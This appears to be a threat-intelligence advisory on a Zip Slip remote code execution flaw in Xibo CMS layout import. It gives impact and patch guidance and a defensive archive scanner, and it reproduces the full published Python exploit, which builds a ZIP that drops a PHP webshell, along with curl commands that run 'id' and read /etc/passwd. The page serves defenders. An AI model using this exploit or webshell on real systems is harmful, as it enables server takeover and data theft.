xibocms 3.3.4 - RCE
AI Analysis
Technical Summary
Xibo CMS 3.3.4 is affected by an authenticated remote code execution vulnerability. The published exploit header identifies it as CVE-2023-33177 (GHSA-jj27-x85q-crqv) and lists the affected range as 1.8.0 to 2.3.16 and 3.0.0 to 3.3.4. The vector is a Zip Slip path traversal in the layout import feature: the "file" field of mapping.json inside an uploaded layout ZIP is joined to the library temp directory without a containment check, so an entry such as ../../web/shell.php is written into the web root and can then be requested as PHP. Exploit code has been published on Exploit-DB (ID 52500) in Python; the script only generates the malicious archive, and the upload is performed through the normal Layouts → Import UI by any user with layout import permission. The exploit header names 2.3.17 and 3.3.5 as the fixed versions; no separate vendor advisory is reproduced on this page.
Potential Impact
Successful exploitation lets an authenticated user with layout import permission write a PHP webshell into the web root of the affected Xibo CMS installation and execute arbitrary commands with the privileges of the web server (PHP) process. Because the file lands in the web root, the shell is reachable by anyone who can reach the CMS, not only the uploading account. Depending on how that process is confined, this can lead to full system compromise.
Mitigation Recommendations
Per the exploit header, upgrade to Xibo CMS 2.3.17 or later on the 2.x branch, or 3.3.5 or later on the 3.x branch, and confirm the fixed version against the vendor advisory for GHSA-jj27-x85q-crqv. Until patched, restrict network access to the CMS, limit layout import permission to trusted users, and review which accounts hold it. Hunt for exploitation: look for unexpected .php files directly under the web root (the published exploit writes web/shell.php, but the name is attacker-chosen), for requests to such files carrying a cmd parameter, and for layout imports that ended in JSON errors, since the exploit notes that the file is written even when the import subsequently fails. Consider isolating or disabling the vulnerable service if feasible.
Indicators of Compromise
- exploit-code (Exploit-DB 52500, Python source as published):

# Exploit Title: XiboCMS 3.3.4 - Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# Mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
#    Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""

import zipfile
import json
import sys


def create_exploit():
    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")

    # Valid Xibo 3.0 layout structure
    # This ensures the ZIP passes initial validation checks
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers JSON import code path
    playlist_json = {}

    # VULNERABILITY: Path traversal in mapping.json
    # The 'file' field is not properly sanitized before file extraction
    # Xibo constructs the extraction path as: library/temp/ + file['file']
    # Using ../../ allows escaping the library directory
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell for command execution
    # Accepts commands via GET parameter: ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: The file path in the ZIP must match what Xibo expects
            # Xibo calls: $zip->getStream('library/' . $file['file'])
            # Therefore we place the file at: library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("\n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (file is already written)")
        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
        print("\n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)


if __name__ == "__main__":
    create_exploit()
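The vulnerability chain in the exploit header (library/temp/ + ../../web/shell.php) and the hunting advice in the mitigation section both reduce to one missing check: the path taken from mapping.json is joined to the extraction directory without confirming that the result stays inside it. The Python below is an added example written for this page, not code from the exploit author or from the Xibo project. It rebuilds a minimal layout archive in memory shaped like the exploit's (constructed sample data), shows the naive join landing in the web root, implements the containment check that rejects it, and wraps both into a scanner a defender can run over uploaded layout archives before import or when triaging a suspected compromise. The temp directory /var/www/cms/library/temp and all function names are assumptions taken from the exploit's description, not Xibo's actual code.

```python
import io
import json
import posixpath
import zipfile

# Assumed extraction directory, taken from the exploit header; Xibo's real
# code path and variable names are not shown on this page.
TEMP_DIR = "/var/www/cms/library/temp"


def naive_destination(temp_dir, mapped_file):
    """The unsafe join the exploit relies on: temp_dir + mapping.json 'file'.

    Only lexical normalisation is applied, so '..' components walk out of
    temp_dir exactly as the exploit's 'Vulnerability Chain' describes.
    """
    return posixpath.normpath(posixpath.join(temp_dir, mapped_file))


def safe_destination(temp_dir, mapped_file):
    """Hardened join: normalise the path and require it to stay under temp_dir.

    Raises ValueError for empty names, absolute paths, backslash separators
    and any path whose normalised form leaves temp_dir (including prefix
    tricks such as ../temp2/x). Production code should additionally resolve
    symlinks with os.path.realpath once the directory exists on disk.
    """
    base = posixpath.normpath(temp_dir)
    if not mapped_file or mapped_file.startswith("/") or "\\" in mapped_file:
        raise ValueError("empty name, absolute path or backslash separator")
    target = posixpath.normpath(posixpath.join(base, mapped_file))
    if not target.startswith(base + "/"):
        raise ValueError("resolved path leaves the extraction directory")
    return target


def is_contained(temp_dir, mapped_file):
    """Boolean form of safe_destination for quick checks."""
    try:
        safe_destination(temp_dir, mapped_file)
        return True
    except ValueError:
        return False


def scan_layout_archive(zip_bytes, temp_dir=TEMP_DIR):
    """Return a list of findings for an uploaded layout ZIP; [] means clean.

    Two independent signals are checked: raw ZIP entry names containing '..'
    or absolute paths, and mapping.json 'file' values that would not stay
    inside temp_dir or that name server-side executable files.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        for name in names:
            if name.startswith("/") or "\\" in name or ".." in name.split("/"):
                findings.append(f"zip entry escapes archive root: {name}")
        if "mapping.json" in names:
            try:
                mapping = json.loads(zf.read("mapping.json"))
            except ValueError:
                findings.append("mapping.json is not valid JSON")
                mapping = []
            if not isinstance(mapping, list):
                mapping = []
            for entry in mapping:
                mapped = entry.get("file", "") if isinstance(entry, dict) else ""
                if not is_contained(temp_dir, mapped):
                    findings.append(f"mapping.json 'file' leaves library: {mapped}")
                if mapped.lower().endswith((".php", ".phtml", ".phar")):
                    findings.append(f"mapping.json 'file' is server-side executable: {mapped}")
    return findings


def build_sample_archive(malicious):
    """Constructed sample data: a minimal layout ZIP built in memory.

    With malicious=True it mirrors the published exploit (traversal in both
    mapping.json and the entry name); otherwise it holds a benign media entry.
    """
    mapped = "../../web/shell.php" if malicious else "abc.png"
    payload = b'<?php system($_GET["cmd"]); ?>' if malicious else b"\x89PNG"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("layout.json", json.dumps({"layout": "Sample", "layoutDefinitions": {}}))
        zf.writestr("playlist.json", "{}")
        zf.writestr("mapping.json", json.dumps(
            [{"file": mapped, "name": posixpath.basename(mapped), "type": "module"}]))
        zf.writestr("library/" + mapped, payload)
    return buf.getvalue()


if __name__ == "__main__":
    print("naive join :", naive_destination(TEMP_DIR, "../../web/shell.php"))
    print("contained  :", is_contained(TEMP_DIR, "../../web/shell.php"))
    for label, blob in (("malicious", build_sample_archive(True)),
                        ("benign", build_sample_archive(False))):
        print(label, scan_layout_archive(blob) or "clean")
```

The scanner deliberately checks the raw ZIP entry names as well as mapping.json: the exploit must place the payload at library/../../web/shell.php for the server's getStream call to find it, so a '..' component in an entry name is a signal on its own even if mapping.json has been tampered with to look clean. Run it as a pre-import gate on uploaded archives, or over archives recovered from upload logs when triaging.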
Technical Details
- EDB ID: 52500
- Has exploit code: true
- Code language: Python
Threat ID: 69d842c21cc7ad14da3f5b29
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:23:02 AM
Last updated: 4/10/2026, 8:31:04 AM